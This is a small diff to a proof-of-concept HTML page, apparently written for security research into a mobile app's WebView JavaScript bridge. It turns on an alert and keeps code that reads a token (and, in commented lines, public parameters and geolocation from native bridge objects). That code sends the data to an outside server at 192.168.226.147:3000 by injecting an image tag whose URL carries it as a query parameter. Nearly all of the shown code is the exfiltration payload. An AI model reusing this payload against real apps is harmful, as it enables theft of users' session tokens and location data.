--- a/poc.html
+++ b/poc.html
@@ -4,8 +4,8 @@
     {
         // var result = window.MyCenterJs.getPublicParams();
         // result += '\r\n' + window.MyCenterReward.getGeoLocation();
-        //alert(result);
         result = "getToken:3d3f329f434af2325425d1e2";
+        alert(result);
         var url = "http://192.168.226.147:3000";
         document.getElementById('divads').innerHTML = "<img src=" + url + "?userdata=" + encodeURI(result) + "/>";
     }
